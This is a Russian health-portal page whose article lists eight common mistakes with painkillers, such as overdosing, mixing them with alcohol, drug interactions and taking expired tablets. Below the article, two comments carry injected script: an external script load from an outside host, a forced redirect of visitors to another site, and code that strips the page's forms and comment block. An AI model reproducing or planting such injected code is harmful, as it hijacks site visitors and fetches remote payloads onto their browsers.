Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Можно ли запить таблетку ...  >>  Можно ли запить таблетку пивом?
 
Обратная связь
 

Можно ли запить таблетку пивом?

Размер шрифта
14 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

В нашей статье представлены наиболее частые ошибки, которые мы допускаем при приеме обезболивающих препаратов.

Можно ли запить таблетку пивом?

Ошибка 1: передозировка

Прием препарата в той дозе, которую выписывает врач, гарантирует максимальную эффективность и минимальный риск для здоровья. Увеличение дозы не ускорит облегчение боли, зато приведет к развитию побочных эффектов. Для того чтобы лекарство подействовало, должно пройти определенное время, поэтому не стоит ожидать эффекта через 5 минут после приема препарата. Спросите у врача, что делать, если лекарство не подействовало, и какова максимально допустимая доза. Кроме того, не принимайте одновременно сразу несколько обезболивающих препаратов.

Ошибка 2: невнимательность

Многие люди, принимая обезболивающие препараты, даже не запоминают их названия. Подобная халатность может сыграть с вами злую шутку, ведь некоторые обезболивающие препараты являются комбинированными. Если вы сначала приняли один обезболивающий препарат, а затем – комбинированный препарат, содержащий тот же препарат, что и в первом случае, то высок риск передозировки.

Ошибка 3: алкоголь

Обезболивающие препараты несовместимы с алкоголем, поскольку они усиливают действие друг друга. И это правило касается не только крепких алкогольных напитков, но и вина, и пива. Будьте осторожны и никогда не смешивайте алкоголь с лекарствами.

Ошибка 4: лекарственные взаимодействия

Прежде чем принять тот или иной препарат, вспомните, какие препараты, травы и добавки вы принимаете в настоящий момент. Все, что вы принимаете, может взаимодействовать с обезболивающими препаратами и увеличивать риск развития побочных эффектов. Например, аспирин взаимодействует с сахароснижающими препаратами, кодеин – с антидепрессантами. Так что первым делом проконсультируйтесь  с врачом.

Ошибка 5: неуместная доброта

К сожалению, многие люди по доброте душевной делятся своими лекарствами с друзьями, родственниками и коллегами, хотя это абсолютно неправильно. Если вам подходит тот или иной обезболивающий препарат, то вашему другу или коллеге он может не подойти. Вы не знаете о состоянии здоровья другого человека, и вместо того, чтобы помочь, можете ему навредить. Поэтому в следующий раз подумайте, прежде чем делиться лекарствами с окружающими.

Ошибка 6: самонадеянность

Прочитать инструкцию к лекарственному препарату и понять, что в ней написано, не так уж легко. Для того чтобы помочь покупателям разобраться в разнообразии лекарств, в аптеках работают фармацевты, которые могут предоставить вам нужную информацию. Не стесняйтесь – советуйтесь с фармацевтами. Но помните, что последняя инстанция – это врач!

Ошибка 7: просроченные лекарства

Каждый лекарственный препарат имеет определенный срок годности, по истечении которого он не только перестанет оказывать лечебный эффект, но даже может навредить. Поэтому прежде чем принять тот или иной препарат, обратите внимание на срок годности. Даже если после окончания срока годности прошел всего месяц, препарат принимать не следует.

Ошибка 8: деление таблеток

Для того чтобы лекарство подействовало, оно должно находиться именно в том виде, в котором оно было выпущено. Делить можно только те таблетки, на которых есть специальная риска. Если риска отсутствует, то делить таблетки категорически запрещается.

Не совершайте эти простые ошибки, и ваша боль пройдет бесследно!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как не напиться   Оказывается, мозг знает, как нам не выпить лишнего! Почему же мы напиваемся?   Чья печень в опасности: алкотипы. Часть 5   Для кого алкоголь опасней всего  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Еда и лекарства: когда их нельзя смешивать
Как похудеть ничего не делая?
Что заставит вас храпеть

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.